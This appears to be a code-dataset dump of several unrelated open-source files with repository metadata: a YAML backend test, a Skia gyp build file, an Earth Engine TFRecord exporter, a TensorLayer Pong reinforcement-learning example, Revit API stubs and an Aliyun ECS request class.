self.db = tempfile.mkdtemp()
for filename, content in files.items():
file(os.path.join(self.db, filename), 'w+').write(content)
def test_yamlbackend_load(self):
f1 = """
---
key: value
"""
f2 = """
---
key2: value2
"""
files = {'f1.yaml': f1, 'f2.yaml': f2}
self.create_db(files)
backend = YAMLBackend(db_path=self.db)
backend.load_db()
default_data, data = backend.get_data()
self.assertEqual(default_data, None)
self.assertEqual(len(data), 2)
def test_yamlbackend_load_with_default(self):
f1 = """
---
key: value
"""
f2 = """
---
key2: value2
"""
files = {'default.yaml': f1, 'f2.yaml': f2}
self.create_db(files)
backend = YAMLBackend(
db_path=self.db,
db_default_file=os.path.join(self.db, 'default.yaml'))
backend.load_db()
default_data, data = backend.get_data()
self.assertDictEqual(default_data, {'key': 'value'})
self.assertEqual(len(data), 1)
self.assertDictEqual(data[0], {'key2': 'value2'})
| 27.324324
| 75
| 0.638971
|
66089e34ff0088d41585376c9776b24fb823a595
| 1,502
|
gyp
|
Python
|
gyp/sfnt.gyp
|
coltorchen/android-skia
|
91bb0c6f4224715ab78e3f64ba471a42d5d5a307
|
[
"BSD-3-Clause"
] | 2
|
2017-05-19T08:53:12.000Z
|
2017-08-28T11:59:26.000Z
|
gyp/sfnt.gyp
|
coltorchen/android-skia
|
91bb0c6f4224715ab78e3f64ba471a42d5d5a307
|
[
"BSD-3-Clause"
] | 2
|
2017-07-25T09:37:22.000Z
|
2017-08-04T07:18:56.000Z
|
gyp/sfnt.gyp
|
coltorchen/android-skia
|
91bb0c6f4224715ab78e3f64ba471a42d5d5a307
|
[
"BSD-3-Clause"
] | 2
|
2017-08-09T09:03:23.000Z
|
2020-05-26T09:14:49.000Z
|
{
'targets': [
{
'target_name': 'sfnt',
'product_name': 'skia_sfnt',
'type': 'static_library',
'standalone_static_library': 1,
'dependencies': [
'core.gyp:core',
],
'include_dirs': [
'../src/sfnt',
],
'sources': [
'../src/sfnt/SkIBMFamilyClass.h',
'../src/sfnt/SkOTTableTypes.h',
'../src/sfnt/SkOTTable_glyf.h',
'../src/sfnt/SkOTTable_head.h',
'../src/sfnt/SkOTTable_hhea.h',
'../src/sfnt/SkOTTable_loca.h',
'../src/sfnt/SkOTTable_maxp.h',
'../src/sfnt/SkOTTable_maxp_CFF.h',
'../src/sfnt/SkOTTable_maxp_TT.h',
'../src/sfnt/SkOTTable_name.h',
'../src/sfnt/SkOTTable_OS_2.h',
'../src/sfnt/SkOTTable_OS_2_V0.h',
'../src/sfnt/SkOTTable_OS_2_V1.h',
'../src/sfnt/SkOTTable_OS_2_V2.h',
'../src/sfnt/SkOTTable_OS_2_V3.h',
'../src/sfnt/SkOTTable_OS_2_V4.h',
'../src/sfnt/SkOTTable_OS_2_VA.h',
'../src/sfnt/SkOTTable_post.h',
'../src/sfnt/SkPanose.h',
'../src/sfnt/SkOTUtils.h',
'../src/sfnt/SkPreprocessorSeq.h',
'../src/sfnt/SkSFNTHeader.h',
'../src/sfnt/SkTypedEnum.h',
'../src/sfnt/SkOTUtils.cpp',
],
'direct_dependent_settings': {
'include_dirs': [
'../src/sfnt',
],
},
},
],
}
# Local Variables:
# tab-width:2
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=2 shiftwidth=2:
| 27.309091
| 44
| 0.52996
|
01f8289c8f94e10ff000dbc3597f1e83c6dd8d73
| 11,551
|
py
|
Python
|
Notebooks/0-TFRecords/preprocess/ee_data_preprocess.py
|
ikerey/Deep-Learning-with-TensorFlow2-Keras
|
865b07b445e45122c62434fe853d422a95cfe07a
|
[
"MIT"
] | null | null | null |
Notebooks/0-TFRecords/preprocess/ee_data_preprocess.py
|
ikerey/Deep-Learning-with-TensorFlow2-Keras
|
865b07b445e45122c62434fe853d422a95cfe07a
|
[
"MIT"
] | null | null | null |
Notebooks/0-TFRecords/preprocess/ee_data_preprocess.py
|
ikerey/Deep-Learning-with-TensorFlow2-Keras
|
865b07b445e45122c62434fe853d422a95cfe07a
|
[
"MIT"
] | null | null | null |
import ee
import time
import json
import folium
from shapely.geometry import shape
from . import ee_collection_specifics
from .utils import Polygons_to_MultiPolygon, GeoJSONs_to_FeatureCollections, get_geojson_string, check_status_data
class Preprocess(object):
"""
Training of Deep Learning models in Skydipper
----------
privatekey_path: string
A string specifying the direction of a json keyfile on your local filesystem
e.g. "/Users/me/.privateKeys/key_with_bucket_permissions.json"
"""
def __init__(self):
#import env files & services auth
self.ee_tiles = 'https://earthengine.googleapis.com/map/{mapid}/{{z}}/{{x}}/{{y}}?token={token}'
def composite(self, slugs=["Landsat-8-Surface-Reflectance"], init_date='2017-01-01', end_date='2017-12-31', lat=39.31, lon=0.302, zoom=6):
"""
Returns a folium map with the composites.
Parameters
----------
slugs: list
A list of dataset slugs to display on the map.
init_date: string
Initial date of the composite.
end_date: string
Last date of the composite.
lat: float
A latitude to focus the map on.
lon: float
A longitude to focus the map on.
zoom: int
A z-level for the map.
"""
self.slugs = slugs
self.init_date = init_date
self.end_date= end_date
self.lat = lat
self.lon = lon
self.zoom = zoom
map = folium.Map(
location=[self.lat, self.lon],
zoom_start=self.zoom,
tiles='OpenStreetMap',
detect_retina=True,
prefer_canvas=True
)
composites = []
for n, slug in enumerate(self.slugs):
composites.append(ee_collection_specifics.Composite(slug)(init_date, end_date))
mapid = composites[n].getMapId(ee_collection_specifics.vizz_params_rgb(slug))
folium.TileLayer(
tiles=mapid['tile_fetcher'].url_format,
attr='Google Earth Engine',
overlay=True,
name=slug).add_to(map)
self.composites = composites
map.add_child(folium.LayerControl())
return map
def select_areas(self, attributes, zoom=6):
"""Create the geometries from which we will export the data.
----------
attributes: list
List of geojsons with the trainig, validation, and testing polygons.
zoom: int
A z-level for the map.
"""
# Get MultiPolygon geostore object
self.multi_polygon = Polygons_to_MultiPolygon(attributes)
nFeatures = len(self.multi_polygon.get('geojson').get('features'))
self.nPolygons = {}
for n in range(nFeatures):
multipoly_type = self.multi_polygon.get('geojson').get('features')[n].get('properties').get('name')
self.nPolygons[multipoly_type] = len(self.multi_polygon.get('geojson').get('features')[n].get('geometry').get('coordinates'))
for multipoly_type in self.nPolygons.keys():
print(f'Number of {multipoly_type} polygons:', self.nPolygons[multipoly_type])
# Returns a folium map with the polygons
features = self.multi_polygon['geojson']['features']
if len(features) > 0:
shapely_geometry = [shape(feature['geometry']) for feature in features]
else:
shapely_geometry = None
self.centroid = list(shapely_geometry[0].centroid.coords)[0][::-1]
map = folium.Map(location=self.centroid, zoom_start=zoom)
if hasattr(self, 'composites'):
for n, slug in enumerate(self.slugs):
mapid = self.composites[n].getMapId(ee_collection_specifics.vizz_params_rgb(slug))
folium.TileLayer(
tiles=mapid['tile_fetcher'].url_format,
attr='Google Earth Engine',
overlay=True,
name=slug).add_to(map)
nFeatures = len(features)
colors = [['#FFFFFF', '#2BA4A0'],['#2BA4A0', '#FFE229'], ['#FFE229', '#FFFFFF']]
for n in range(nFeatures):
style_functions = [lambda x: {'fillOpacity': 0.0, 'weight': 4, 'color': color} for color in colors[n]]
folium.GeoJson(data=get_geojson_string(features[n]['geometry']), style_function=style_functions[n],\
name=features[n].get('properties').get('name')).add_to(map)
map.add_child(folium.LayerControl())
return map
def stack_images(self, feature_collections):
"""
Stack the 2D images (input and output images of the Neural Network)
to create a single image from which samples can be taken
"""
for n, slug in enumerate(self.slugs):
# Stack RGB images
if n == 0:
self.image_stack = self.composites[n].visualize(**ee_collection_specifics.vizz_params_rgb(slug))
else:
#self.image_stack = ee.Image.cat([self.image_stack,self.composites[n].visualize(**ee_collection_specifics.vizz_params_rgb(slug))]).float()
self.image_stack = ee.Image.cat([self.image_stack,self.composites[n]]).float()
if self.kernel_size == 1:
self.base_names = ['training_pixels', 'test_pixels']
# Sample pixels
vector = self.image_stack.sample(region = feature_collections[0], scale = self.scale,\
numPixels=self.sample_size, tileScale=4, seed=999)
# Add random column
vector = vector.randomColumn(seed=999)
# Partition the sample approximately 75%, 25%.
self.training_dataset = vector.filter(ee.Filter.lt('random', 0.75))
self.test_dataset = vector.filter(ee.Filter.gte('random', 0.75))
# Training and validation size
self.training_size = self.training_dataset.size().getInfo()
self.test_size = self.test_dataset.size().getInfo()
if self.kernel_size > 1:
self.base_names = ['training_patches', 'test_patches']
# Convert the image into an array image in which each pixel stores (kernel_size x kernel_size) patches of pixels for each band.
list = ee.List.repeat(1, self.kernel_size)
lists = ee.List.repeat(list, self.kernel_size)
kernel = ee.Kernel.fixed(self.kernel_size, self.kernel_size, lists)
self.arrays = self.image_stack.neighborhoodToArray(kernel)
# Training and test size
nFeatures = len(self.multi_polygon.get('geojson').get('features'))
nPolygons = {}
for n in range(nFeatures):
multipoly_type = self.multi_polygon.get('geojson').get('features')[n].get('properties').get('name')
nPolygons[multipoly_type] = len(self.multi_polygon.get('geojson').get('features')[n].get('geometry').get('coordinates'))
self.training_size = nPolygons['training']*self.sample_size
self.test_size = nPolygons['test']*self.sample_size
def start_TFRecords_task(self, feature_collections, feature_lists):
"""
Create TFRecord's exportation task
"""
# These numbers determined experimentally.
nShards = int(self.sample_size/20) # Number of shards in each polygon.
if self.kernel_size == 1:
# Export all the training validation and test data.
self.file_paths = []
for n, dataset in enumerate([self.training_dataset, self.validation_dataset, self.test_dataset]):
self.file_paths.append(self.bucket+ '/' + self.folder + '/' + self.base_names[n])
# Create the tasks.
task = ee.batch.Export.table.toCloudStorage(
collection = dataset,
description = 'Export '+self.base_names[n],
fileNamePrefix = self.folder + '/' + self.base_names[n],
bucket = self.bucket,
fileFormat = 'TFRecord',
selectors = list(self.image_stack.bandNames().getInfo())
)
task.start()
if self.kernel_size > 1:
# Export all the training validation and test data. (in many pieces), with one task per geometry.
self.file_paths = []
for i, feature in enumerate(feature_collections):
for g in range(feature.size().getInfo()):
geomSample = ee.FeatureCollection([])
for j in range(nShards):
sample = self.arrays.sample(
region = ee.Feature(feature_lists[i].get(g)).geometry(),
scale = self.scale,
numPixels = self.sample_size / nShards, # Size of the shard.
seed = j,
tileScale = 8
)
geomSample = geomSample.merge(sample)
desc = self.base_names[i] + '_g' + str(g)
self.file_paths.append(self.bucket+ '/' + self.folder + '/' + desc)
task = ee.batch.Export.table.toCloudStorage(
collection = geomSample,
description = desc,
bucket = self.bucket,
fileNamePrefix = self.folder + '/' + desc,
fileFormat = 'TFRecord',
selectors = list(self.image_stack.bandNames().getInfo())
)
task.start()
return task
def export_TFRecords(self, sample_size, kernel_size, scale, bucket, folder):
"""
Export TFRecords to GCS.
Parameters
----------
sample_size: int
Number of samples to extract from each polygon.
kernel_size: int
An integer specifying the height and width of the 2D images.
scale: float
Scale of the images in meters.
bucket: string
Bucket name.
folder: string
Folder path to save the data.
"""
self.sample_size = sample_size
self.kernel_size = kernel_size
self.scale = scale
self.bucket = bucket
self.folder = folder
# Convert the GeoJSON to feature collections
feature_collections = GeoJSONs_to_FeatureCollections(self.multi_polygon)
# Convert the feature collections to lists for iteration.
feature_lists = list(map(lambda x: x.toList(x.size()), feature_collections))
## Stack the 2D images to create a single image from which samples can be taken
self.stack_images(feature_collections)
## Start task
task = self.start_TFRecords_task(feature_collections, feature_lists)
# Monitor task status
print('Exporting TFRecords to GCS:')
status_list = check_status_data(task, self.file_paths)
while not status_list == ['COMPLETED'] * len(self.file_paths):
status_list = check_status_data(task, self.file_paths)
#Print temporal status
tmp_status = json.dumps(dict(zip(self.file_paths, status_list)))
print('Temporal status: ', tmp_status)
time.sleep(60)
# Print final status
print('Final status: COMPLETED')
| 40.672535
| 154
| 0.584019
|
4774851a3a74886cd627478ab92aeb93dde703ff
| 277
|
py
|
Python
|
factorial.py
|
phsantosjr/python-algorithms
|
4683b66eb3b7e934ccb8f7bb263f3988a661c202
|
[
"CNRI-Python"
] | null | null | null |
factorial.py
|
phsantosjr/python-algorithms
|
4683b66eb3b7e934ccb8f7bb263f3988a661c202
|
[
"CNRI-Python"
] | null | null | null |
factorial.py
|
phsantosjr/python-algorithms
|
4683b66eb3b7e934ccb8f7bb263f3988a661c202
|
[
"CNRI-Python"
] | null | null | null |
from utils import timer_decorator
@timer_decorator
def fact_1(n: int) -> int:
product = 1
for i in range(n):
product = product * (i+1)
return product
@timer_decorator
def fact_2(n: int) -> int:
if n == 0:
return 1
return n * fact_2(n-1)
| 16.294118
| 33
| 0.602888
|
c2640e665c5a574cd9b095a2f8c64075ea820ad2
| 13,280
|
py
|
Python
|
stubs.min/Autodesk/Revit/DB/__init___parts/FabricationConfiguration.py
|
ricardyn/ironpython-stubs
|
4d2b405eda3ceed186e8adca55dd97c332c6f49d
|
[
"MIT"
] | 1
|
2021-02-02T13:39:16.000Z
|
2021-02-02T13:39:16.000Z
|
stubs.min/Autodesk/Revit/DB/__init___parts/FabricationConfiguration.py
|
hdm-dt-fb/ironpython-stubs
|
4d2b405eda3ceed186e8adca55dd97c332c6f49d
|
[
"MIT"
] | null | null | null |
stubs.min/Autodesk/Revit/DB/__init___parts/FabricationConfiguration.py
|
hdm-dt-fb/ironpython-stubs
|
4d2b405eda3ceed186e8adca55dd97c332c6f49d
|
[
"MIT"
] | null | null | null |
class FabricationConfiguration(Element,IDisposable):
""" This element contains the information about the fabrication configuration settings used by the project. """
def CanBeSwapped(self):
"""
CanBeSwapped(self: FabricationConfiguration) -> bool
Checks if the fabrication configuration can be swapped.
Returns: True if the fabrication configuration can be swapped,false otherwise.
"""
pass
def Dispose(self):
""" Dispose(self: Element,A_0: bool) """
pass
def GetAllFabricationConnectorDefinitions(self,domain,shape):
"""
GetAllFabricationConnectorDefinitions(self: FabricationConfiguration,domain: ConnectorDomainType,shape: ConnectorProfileType) -> IList[int]
Gets fabrication connector identifiers from the fabrication configuration,
filtered by shape and domain.
domain: ConnectorDomainType to filter by. Pass ConnectorDomainType.Undefined to get all
connector domains.
shape: ConnectorProfileType to filter by. Pass ConnectorProfileType.Invalid to get all
shapes.
Returns: All the fabrication connector identifiers,filtered by shape and domain. The
return will be empty if no connectors are found.
"""
pass
def GetAllInsulationSpecifications(self,pFabPart):
"""
GetAllInsulationSpecifications(self: FabricationConfiguration,pFabPart: FabricationPart) -> IList[int]
Gets all insulation specification identifiers in the fabrication configuration.
pFabPart: The fabrication part.
Returns: An array of insulation specification identifiers.
"""
pass
def GetAllLoadedServices(self):
"""
GetAllLoadedServices(self: FabricationConfiguration) -> IList[FabricationService]
Returns all the loaded fabrication services.
Returns: All the loaded fabrication services.
"""
pass
def GetAllMaterials(self,part):
"""
GetAllMaterials(self: FabricationConfiguration,part: FabricationPart) -> IList[int]
Gets all material identifiers in the fabrication configuration.
part: The fabrication part.
Returns: An array of material identifiers.
"""
pass
def GetAllServices(self):
"""
GetAllServices(self: FabricationConfiguration) -> IList[FabricationService]
Returns all fabrication services in the fabrication configuration.
Returns: All fabrication services. The return will be empty if no services are found.
"""
pass
def GetAllSpecifications(self,part):
"""
GetAllSpecifications(self: FabricationConfiguration,part: FabricationPart) -> IList[int]
Gets all specification identifiers in the fabrication configuration.
part: The fabrication part.
Returns: An array of specification identifiers.
"""
pass
def GetAllUsedServices(self):
"""
GetAllUsedServices(self: FabricationConfiguration) -> IList[FabricationService]
Returns all the used fabrication services. A service is used if any fabrication
part in the service is created by user.
Returns: All the used fabrication services.
"""
pass
def getBoundingBox(self,*args):
""" getBoundingBox(self: Element,view: View) -> BoundingBoxXYZ """
pass
@staticmethod
def GetFabricationConfiguration(doc):
"""
GetFabricationConfiguration(doc: Document) -> FabricationConfiguration
Gets the fabrication configuration element in the document.
doc: The document.
Returns: The fabrication configuration element in the document.
"""
pass
def GetFabricationConfigurationInfo(self):
"""
GetFabricationConfigurationInfo(self: FabricationConfiguration) -> FabricationConfigurationInfo
Gets the information about the fabrication configuration of the project.
Returns: The information about the fabrication configuration of the project.
"""
pass
def GetFabricationConnectorDomain(self,fabricationConnectorId):
"""
GetFabricationConnectorDomain(self: FabricationConfiguration,fabricationConnectorId: int) -> ConnectorDomainType
Gets the fabrication connector domain from its identifier.
fabricationConnectorId: The fabrication connector identifier.
Returns: The fabrication connector's domain.
"""
pass
def GetFabricationConnectorGroup(self,fabricationConnectorId):
"""
GetFabricationConnectorGroup(self: FabricationConfiguration,fabricationConnectorId: int) -> str
Gets the fabrication connector group from its identifier.
fabricationConnectorId: The fabrication connector identifier.
Returns: The fabrication connector's group.
"""
pass
def GetFabricationConnectorName(self,fabricationConnectorId):
"""
GetFabricationConnectorName(self: FabricationConfiguration,fabricationConnectorId: int) -> str
Gets the fabrication connector name from its identifier.
fabricationConnectorId: The fabrication connector identifier.
Returns: The fabrication connector's name.
"""
pass
def GetFabricationConnectorShape(self,fabricationConnectorId):
"""
GetFabricationConnectorShape(self: FabricationConfiguration,fabricationConnectorId: int) -> ConnectorProfileType
Gets the fabrication connector shape from its identifier.
fabricationConnectorId: The fabrication connector identifier.
Returns: The fabrication connector's shape.
"""
pass
def GetInsulationSpecificationAbbreviation(self,insulationSpecificationId):
"""
GetInsulationSpecificationAbbreviation(self: FabricationConfiguration,insulationSpecificationId: int) -> str
Gets insulation specification abbreviation.
insulationSpecificationId: The insulation specification identifier.
"""
pass
def GetInsulationSpecificationGroup(self,specId):
"""
GetInsulationSpecificationGroup(self: FabricationConfiguration,specId: int) -> str
Gets the insulation specification group from its identifier.
specId: The insulation specification identifier.
Returns: The insulation specification group.
"""
pass
def GetInsulationSpecificationName(self,specId):
"""
GetInsulationSpecificationName(self: FabricationConfiguration,specId: int) -> str
Gets the insulation specification name from its identifier.
specId: The insulation specification identifier.
Returns: The insulation specification name.
"""
pass
def GetMaterialAbbreviation(self,materialId):
"""
GetMaterialAbbreviation(self: FabricationConfiguration,materialId: int) -> str
Gets the abreviation of the material or the insulation or the double wall
material.
materialId: The material identifier.
"""
pass
def GetMaterialGroup(self,materialId):
"""
GetMaterialGroup(self: FabricationConfiguration,materialId: int) -> str
Gets material group from its identifier.
materialId: The material identifier.
Returns: The material group.
"""
pass
def GetMaterialName(self,materialId):
"""
GetMaterialName(self: FabricationConfiguration,materialId: int) -> str
Gets material name from its identifier.
materialId: The material identifier.
Returns: The material name without the group.
"""
pass
def GetMaterialThickness(self,materialId,gaugeId):
"""
GetMaterialThickness(self: FabricationConfiguration,materialId: int,gaugeId: int) -> float
Gets material thickness from its material/gauge identifiers.
materialId: The material identifier.
gaugeId: The gauge identifier within the specified material.
Returns: The thickness of the material/gauge.
"""
pass
def GetProfile(self):
"""
GetProfile(self: FabricationConfiguration) -> str
Return the profile of the loaded fabrication configuration. Return empty string
for global profile.
"""
pass
def GetService(self,serviceId):
"""
GetService(self: FabricationConfiguration,serviceId: int) -> FabricationService
Get the service based on the service identifier from the fabrication
configuration in the current document.
serviceId: The service identifier.
Returns: The service based on the service identifier.
"""
pass
def GetSpecificationAbbreviation(self,specificationId):
"""
GetSpecificationAbbreviation(self: FabricationConfiguration,specificationId: int) -> str
Gets specification abreviation.
specificationId: The specification identifier.
"""
pass
def GetSpecificationGroup(self,specId):
"""
GetSpecificationGroup(self: FabricationConfiguration,specId: int) -> str
Gets the specification group from its identifier.
specId: The specification identifier.
Returns: The specification group.
"""
pass
def GetSpecificationName(self,specId):
"""
GetSpecificationName(self: FabricationConfiguration,specId: int) -> str
Gets the specification name from its identifier.
specId: The specification identifier.
Returns: The specification name;
"""
pass
def HasValidConfiguration(self):
"""
HasValidConfiguration(self: FabricationConfiguration) -> bool
Checks whether a valid fabrication configuration has been set for the project.
Returns: True if a valid fabrication configuration has been set for the project.
"""
pass
def LoadServices(self,serviceIds):
""" LoadServices(self: FabricationConfiguration,serviceIds: IList[int]) -> IList[int] """
pass
def LocateFabricationConnector(self,group,name,domain,shape):
"""
LocateFabricationConnector(self: FabricationConfiguration,group: str,name: str,domain: ConnectorDomainType,shape: ConnectorProfileType) -> int
Gets the fabrication connector identifiers by group and name,filtered by shape
and domain.
group: The fabrication connector group.
name: The fabrication connector name.
domain: ConnectorDomainType to filter by. Pass ConnectorDomainType::Undefined to get
all connector domains.
shape: ConnectorProfileType to filter by. Pass ConnectorProfileType::Invalid to get
all shapes.
Returns: Return the fabrication connector identifier. Returns -1 if not found.
"""
pass
def LocateInsulationSpecification(self,group,name):
"""
LocateInsulationSpecification(self: FabricationConfiguration,group: str,name: str) -> int
Gets the insulation specification by group and name.
group: The insulation specification group.
name: The insulation specification name.
Returns: The insulation specification identifier. Returns -1 if not found.
"""
pass
def LocateMaterial(self,group,name):
"""
LocateMaterial(self: FabricationConfiguration,group: str,name: str) -> int
Gets material by group and name.
group: The material group.
name: The group name.
Returns: The material identifier. Returns -1 if not found.
"""
pass
def LocateSpecification(self,group,name):
"""
LocateSpecification(self: FabricationConfiguration,group: str,name: str) -> int
Gets the specification identifier by group and name.
group: The specification group.
name: The specification name.
Returns: The specification identifier. Returns -1 if not found.
"""
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: Element,disposing: bool) """
pass
def ReloadConfiguration(self):
"""
ReloadConfiguration(self: FabricationConfiguration) -> ConfigurationReloadInfo
Reloads the fabrication configuration from its source fabrication configuration.
Returns: The information about the reload of the fabrication configuration.
"""
pass
def SetConfiguration(self,fabricationConfigurationInfo,profile=None):
"""
SetConfiguration(self: FabricationConfiguration,fabricationConfigurationInfo: FabricationConfigurationInfo)
Set the fabrication configuration with global profile.
fabricationConfigurationInfo: The desired fabrication configuration.
SetConfiguration(self: FabricationConfiguration,fabricationConfigurationInfo: FabricationConfigurationInfo,profile: str)
Set the fabrication configuration with specific profile.
fabricationConfigurationInfo: The desired fabrication configuration.
profile: The desired profile of the fabrication configuration. Use empty string for the
global profile.
"""
pass
def setElementType(self,*args):
""" setElementType(self: Element,type: ElementType,incompatibleExceptionMessage: str) """
pass
def UnloadServices(self,serviceIds):
""" UnloadServices(self: FabricationConfiguration,serviceIds: IList[int]) """
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
| 35.603217
| 215
| 0.731175
|
0ffee91744eabf13ec286da0906dce52c6ee1f3e
| 4,587
|
py
|
Python
|
examples/reinforcement_learning/tutorial_atari_pong.py
|
KuKuXia/tensorlayer
|
654de4a37892cde54495350f99f5f3b38b2c6eb3
|
[
"Apache-2.0"
] | 1
|
2019-10-21T13:33:52.000Z
|
2019-10-21T13:33:52.000Z
|
examples/reinforcement_learning/tutorial_atari_pong.py
|
Mesica/tensorlayer
|
c5def14c4d66d150863f975d9001a5e1891d003f
|
[
"Apache-2.0"
] | null | null | null |
examples/reinforcement_learning/tutorial_atari_pong.py
|
Mesica/tensorlayer
|
c5def14c4d66d150863f975d9001a5e1891d003f
|
[
"Apache-2.0"
] | null | null | null |
#! /usr/bin/python
# -*- coding: utf-8 -*-
"""Monte-Carlo Policy Network π(a|s) (REINFORCE).
To understand Reinforcement Learning, we let computer to learn how to play
Pong game from the original screen inputs. Before we start, we highly recommend
you to go through a famous blog called “Deep Reinforcement Learning: Pong from
Pixels” which is a minimalistic implementation of deep reinforcement learning by
using python-numpy and OpenAI gym environment.
The code here is the reimplementation of Karpathy's Blog by using TensorLayer.
Compare with Karpathy's code, we store observation for a batch, he store
observation for a episode only, they store gradients instead. (so we will use
more memory if the observation is very large.)
FEEL FREE TO JOIN US !
TODO
-----
- update grads every step rather than storing all observation!
- tensorlayer@gmail.com
References
------------
- http://karpathy.github.io/2016/05/31/rl/
"""
import time
import numpy as np
import gym
import tensorflow as tf
import tensorlayer as tl
tl.logging.set_verbosity(tl.logging.DEBUG)
# hyper-parameters
image_size = 80
D = image_size * image_size
H = 200
batch_size = 10
learning_rate = 1e-4
gamma = 0.99
decay_rate = 0.99
render = False # display the game environment
# resume = True # load existing policy network
model_file_name = "model_pong"
np.set_printoptions(threshold=np.inf)
def prepro(I):
"""Prepro 210x160x3 uint8 frame into 6400 (80x80) 1D float vector."""
I = I[35:195]
I = I[::2, ::2, 0]
I[I == 144] = 0
I[I == 109] = 0
I[I != 0] = 1
return I.astype(np.float32).ravel()
env = gym.make("Pong-v0")
observation = env.reset()
prev_x = None
running_reward = None
reward_sum = 0
episode_number = 0
xs, ys, rs = [], [], []
# policy network
def get_model(inputs_shape):
ni = tl.layers.Input(inputs_shape)
nn = tl.layers.Dense(n_units=H, act=tf.nn.relu, name='hidden')(ni)
nn = tl.layers.Dense(n_units=3, name='output')(nn)
M = tl.models.Model(inputs=ni, outputs=nn, name="mlp")
return M
model = get_model([None, D])
train_weights = model.trainable_weights
optimizer = tf.optimizers.RMSprop(lr=learning_rate, decay=decay_rate)
model.train() # set model to train mode (in case you add dropout into the model)
start_time = time.time()
game_number = 0
while True:
if render:
env.render()
cur_x = prepro(observation)
x = cur_x - prev_x if prev_x is not None else np.zeros(D, dtype=np.float32)
x = x.reshape(1, D)
prev_x = cur_x
_prob = model(x)
prob = tf.nn.softmax(_prob)
# action. 1: STOP 2: UP 3: DOWN
# action = np.random.choice([1,2,3], p=prob.flatten())
# action = tl.rein.choice_action_by_probs(prob.flatten(), [1, 2, 3])
action = tl.rein.choice_action_by_probs(prob[0].numpy(), [1, 2, 3])
observation, reward, done, _ = env.step(action)
reward_sum += reward
xs.append(x) # all observations in an episode
ys.append(action - 1) # all fake labels in an episode (action begins from 1, so minus 1)
rs.append(reward) # all rewards in an episode
if done:
episode_number += 1
game_number = 0
if episode_number % batch_size == 0:
print('batch over...... updating parameters......')
epx = np.vstack(xs)
epy = np.asarray(ys)
epr = np.asarray(rs)
disR = tl.rein.discount_episode_rewards(epr, gamma)
disR -= np.mean(disR)
disR /= np.std(disR)
xs, ys, rs = [], [], []
with tf.GradientTape() as tape:
_prob = model(epx)
_loss = tl.rein.cross_entropy_reward_loss(_prob, epy, disR)
grad = tape.gradient(_loss, train_weights)
optimizer.apply_gradients(zip(grad, train_weights))
## TODO
# if episode_number % (batch_size * 100) == 0:
# tl.files.save_npz(network.all_params, name=model_file_name + '.npz')
running_reward = reward_sum if running_reward is None else running_reward * 0.99 + reward_sum * 0.01
print('resetting env. episode reward total was {}. running mean: {}'.format(reward_sum, running_reward))
reward_sum = 0
observation = env.reset() # reset env
prev_x = None
if reward != 0:
print(
(
'episode %d: game %d took %.5fs, reward: %f' %
(episode_number, game_number, time.time() - start_time, reward)
), ('' if reward == -1 else ' !!!!!!!!')
)
start_time = time.time()
game_number += 1
| 29.785714
| 112
| 0.640942
|
0d4d664b6ba31fbcd5c4aece1c7d950093da6d87
| 2,180
|
py
|
Python
|
aliyun-python-sdk-ecs/aliyunsdkecs/request/v20140526/DetachClassicLinkVpcRequest.py
|
jia-jerry/aliyun-openapi-python-sdk
|
e90f3683a250cfec5b681b5f1d73a68f0dc9970d
|
[
"Apache-2.0"
] | 1
|
2021-03-08T02:59:17.000Z
|
2021-03-08T02:59:17.000Z
|
aliyun-python-sdk-ecs/aliyunsdkecs/request/v20140526/DetachClassicLinkVpcRequest.py
|
jia-jerry/aliyun-openapi-python-sdk
|
e90f3683a250cfec5b681b5f1d73a68f0dc9970d
|
[
"Apache-2.0"
] | 1
|
2020-05-31T14:51:47.000Z
|
2020-05-31T14:51:47.000Z
|
aliyun-python-sdk-ecs/aliyunsdkecs/request/v20140526/DetachClassicLinkVpcRequest.py
|
jia-jerry/aliyun-openapi-python-sdk
|
e90f3683a250cfec5b681b5f1d73a68f0dc9970d
|
[
"Apache-2.0"
] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkecs.endpoint import endpoint_data
class DetachClassicLinkVpcRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Ecs', '2014-05-26', 'DetachClassicLinkVpc','ecs')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ResourceOwnerId(self):
return self.get_query_params().get('ResourceOwnerId')
def set_ResourceOwnerId(self,ResourceOwnerId):
self.add_query_param('ResourceOwnerId',ResourceOwnerId)
def get_ResourceOwnerAccount(self):
return self.get_query_params().get('ResourceOwnerAccount')
def set_ResourceOwnerAccount(self,ResourceOwnerAccount):
self.add_query_param('ResourceOwnerAccount',ResourceOwnerAccount)
def get_OwnerId(self):
return self.get_query_params().get('OwnerId')
def set_OwnerId(self,OwnerId):
self.add_query_param('OwnerId',OwnerId)
def get_InstanceId(self):
return self.get_query_params().get('InstanceId')
def set_InstanceId(self,InstanceId):
self.add_query_param('InstanceId',InstanceId)
def get_VpcId(self):
return self.get_query_params().get('VpcId')
def set_VpcId(self,VpcId):
self.add_query_param('VpcId',VpcId)
| 35.16129
| 79
| 0.769725
|
0ba67a75237432d9da5fcfef3a8e84f0d6873583
| 3,680
|
py
|
Python
|
tests/test_template_filters.py
|
Frojd/wagtail-systemtext
|
27579f7b261572a59e48993ae21a44f789f64b0f
|
[
"MIT"
] | 8
|
2016-12-31T12:00:56.000Z
|
2022-03-23T08:12:04.000Z
|
tests/test_template_filters.py
|
